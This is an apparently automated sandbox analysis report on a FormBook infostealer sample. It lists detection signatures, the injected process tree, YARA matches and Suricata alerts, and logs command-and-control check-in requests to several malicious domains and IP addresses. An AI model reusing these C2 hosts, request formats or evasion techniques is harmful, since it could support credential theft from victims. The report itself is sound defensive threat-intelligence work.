Windows Analysis Report
BalphRTkPS.exe

Overview

General Information

Sample name:BalphRTkPS.exe
renamed because original name is a hash value
Original sample name:2cfc0e37c8bb5910b2155f5585a9ad3b40582319fd2762c48fef6b25c727e929.exe
Analysis ID:1588694
MD5:e3b4ddaa99a7555532ea6b36bff69afc
SHA1:58f1b2ac036a0192d3226a321c0e6e0e8412c3fb
SHA256:2cfc0e37c8bb5910b2155f5585a9ad3b40582319fd2762c48fef6b25c727e929
Tags: exe, Formbook, user-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • BalphRTkPS.exe (PID: 2064 cmdline: "C:\Users\user\Desktop\BalphRTkPS.exe" MD5: E3B4DDAA99A7555532EA6B36BFF69AFC)
    • BalphRTkPS.exe (PID: 356 cmdline: "C:\Users\user\Desktop\BalphRTkPS.exe" MD5: E3B4DDAA99A7555532EA6B36BFF69AFC)
      • ikSQhwOmrrnfH.exe (PID: 280 cmdline: "C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ieUnatt.exe (PID: 2620 cmdline: "C:\Windows\SysWOW64\ieUnatt.exe" MD5: 4E9919DF2EF531B389ABAEFD35AD546E)
          • ikSQhwOmrrnfH.exe (PID: 1436 cmdline: "C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1268 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.4016477333.0000000005150000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4014023454.0000000004D30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2499317497.00000000015A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4013880559.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
6.2.BalphRTkPS.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
6.2.BalphRTkPS.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
                No Sigma rule has matched
                AV Detection

                Source: http://www.appsolucao.shop/qt4m/?9PZt=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&I8A=fF8h_X3X0TBAvira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/bsye/Avira URL Cloud: Label: malware
                Source: http://www.123hellodrive.shop/vc3u/Avira URL Cloud: Label: malware
                Source: http://www.happyjam.life/4t49/?I8A=fF8h_X3X0TB&9PZt=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs=Avira URL Cloud: Label: malware
                Source: https://www.muasamgiare.click/bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jKAvira URL Cloud: Label: malware
                Source: http://www.123hellodrive.shop/vc3u/?9PZt=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&I8A=fF8h_X3X0TBAvira URL Cloud: Label: malware
                Source: http://www.muasamgiare.click/bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&I8A=fF8h_X3X0TBAvira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/qt4m/Avira URL Cloud: Label: malware
                Source: http://www.happyjam.life/4t49/Avira URL Cloud: Label: malware
                Source: BalphRTkPS.exeReversingLabs: Detection: 71%
                Source: BalphRTkPS.exeVirustotal: Detection: 68%
                Source: Yara matchFile source: 6.2.BalphRTkPS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.BalphRTkPS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.4016477333.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4014023454.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2499317497.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4013880559.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2505138823.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4013556321.0000000002840000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: BalphRTkPS.exeJoe Sandbox ML: detected
                Source: BalphRTkPS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: BalphRTkPS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ieUnAtt.pdbGCTL source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000002.4012118498.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ikSQhwOmrrnfH.exe, 00000007.00000002.4011664684.00000000005EE000.00000002.00000001.01000000.0000000C.sdmp, ikSQhwOmrrnfH.exe, 0000000A.00000002.4011666816.00000000005EE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: ieUnAtt.pdb source: BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, BalphRTkPS.exe, 00000006.00000002.2499028347.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000002.4012118498.0000000000A61000.00000004.00000020.00020000.00000000.sdmp, ikSQhwOmrrnfH.exe, 00000007.00000003.2436856278.0000000000A42000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: BalphRTkPS.exe, 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2498943742.0000000004AE1000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2504851800.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BalphRTkPS.exe, BalphRTkPS.exe, 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2498943742.0000000004AE1000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2504851800.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: pldkV.pdb source: BalphRTkPS.exe
                Source: Binary string: pldkV.pdbSHA256K source: BalphRTkPS.exe
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02D8CC50 FindFirstFileW,FindNextFileW,FindClose,8_2_02D8CC50
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then xor eax, eax8_2_02D79F60
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 4x nop then mov ebx, 00000004h8_2_051A04E8

                Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50014 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50001 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50021 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50021 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49987 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49987 -> 154.12.28.184:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50015 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50024 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50027 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50004 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50004 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50020 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50007 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50011 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49998 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49999 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49999 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50018 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50003 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50008 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50008 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50025 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50025 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49995 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49995 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50010 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50023 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50016 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50028 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50026 -> 104.21.32.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50002 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50012 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50012 -> 154.208.202.225:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:50017 -> 77.68.64.45:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50017 -> 77.68.64.45:80
                Source: DNS query: www.aziziyeescortg.xyz
                Source: Joe Sandbox ViewIP Address: 77.68.64.45 77.68.64.45
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /vt4e/?I8A=fF8h_X3X0TB&9PZt=VWo59DE7z/zpNvlQrGwQqnlKKikmhHzFU/awM9upW87Yx15oShf3plLjnAS2lxJKaRtg2RYIywQ4d8OifO+Rpmij5Ffq0kXSJKVYpR6npO/nbInFwrm8n/2iwd1ApVHfxnTP7ZY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.7261ltajbc.bondConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /bsye/?9PZt=mcnQ4SBirrzxTltKHyxTOkuilQ7foOQlHEOXMV6ABku0gY5yW1xEZyvN1jK2v2RF378l0UeaVYff77sSRT2Ifk8NCmqj7EA+sq0ZeNMbUcOm/Pw4wT4fiopZxiw3DzN75FCJC90=&I8A=fF8h_X3X0TB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.muasamgiare.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /86am/?9PZt=3oSH5g+vR97eOiEYl3yzUVrLMoE7cdRqP5dq8IAVURGuW00cQLCZ5FvWMVk05HdygRwRYgTMj/cz+G8Xe6bu8d3TmiM5UZa33tCVJhgbgr0dm7+Mwsdmgoa6VRIc03dgAyFEL2o=&I8A=fF8h_X3X0TB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kkpmoneysocial.topConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /4t49/?I8A=fF8h_X3X0TB&9PZt=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.happyjam.lifeConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /vc3u/?9PZt=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&I8A=fF8h_X3X0TB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.123hellodrive.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /k6vm/?I8A=fF8h_X3X0TB&9PZt=AQF0fE/xUBvXcoq8VPDc3VbpsTF0nlDqSFZLjGUQNoLeoSEU8z/8yZQb5sAEaF7nLYLL9iygL0eptKGi7pEnvFfogATAKvfKf2eq3ZcSrhy/qdqLc/JYZ8TgWJuF+1kS7eDlOqY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.zoomlive.liveConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /725g/?9PZt=uiAekWsFoddhMu9w6av3IR3qRfkxEYhiHCdKsu6SwDAva+OcXfn0u3hNB8zZhz0kzkOslwZXAdf6Zktj+FCGjzQZh9bjjklx+lq67asD3Aqsp6I0O3QatHKxujksh8AYT18lk1s=&I8A=fF8h_X3X0TB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.dietcoffee.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /v2ut/?I8A=fF8h_X3X0TB&9PZt=RylwLg2ZpVS2rFdSlQee5TIAL9VVjaBtzTw+4qXkIOieMIxPna2x473GB7GRuoZi44HZ9KZH1KJCd6HB3lVLIzhxo/qMOX8MgFiq9bThHJniXb4lO04jER0alxiz9odaEmB/xSI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.guacamask.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: GET /qt4m/?9PZt=/ZQwF7Ip71YCaUlU/jTQ7l2Lp/ZTQN44rx1LzCy9bB7kVb+FnyrErN7h2wh6V0uCxKMxAv7qgoDPyMkbBqZLKSqD3jYvFd9V+3GHQAeGdc6B9Gg3Jsv2Vj+r5nwJfwG+iPE84zU=&I8A=fF8h_X3X0TB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.appsolucao.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficDNS traffic detected: DNS query: www.7261ltajbc.bond
                Source: global trafficDNS traffic detected: DNS query: www.muasamgiare.click
                Source: global trafficDNS traffic detected: DNS query: www.kkpmoneysocial.top
                Source: global trafficDNS traffic detected: DNS query: www.artkub.net
                Source: global trafficDNS traffic detected: DNS query: www.happyjam.life
                Source: global trafficDNS traffic detected: DNS query: www.123hellodrive.shop
                Source: global trafficDNS traffic detected: DNS query: www.zoomlive.live
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.guacamask.online
                Source: global trafficDNS traffic detected: DNS query: www.appsolucao.shop
                Source: global trafficDNS traffic detected: DNS query: www.aziziyeescortg.xyz
                Source: unknownHTTP traffic detected: POST /bsye/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.muasamgiare.clickCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 209Connection: closeOrigin: http://www.muasamgiare.clickReferer: http://www.muasamgiare.click/bsye/User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 03:25:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:26:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:26:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:26:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:26:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Sat, 11 Jan 2025 03:31:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
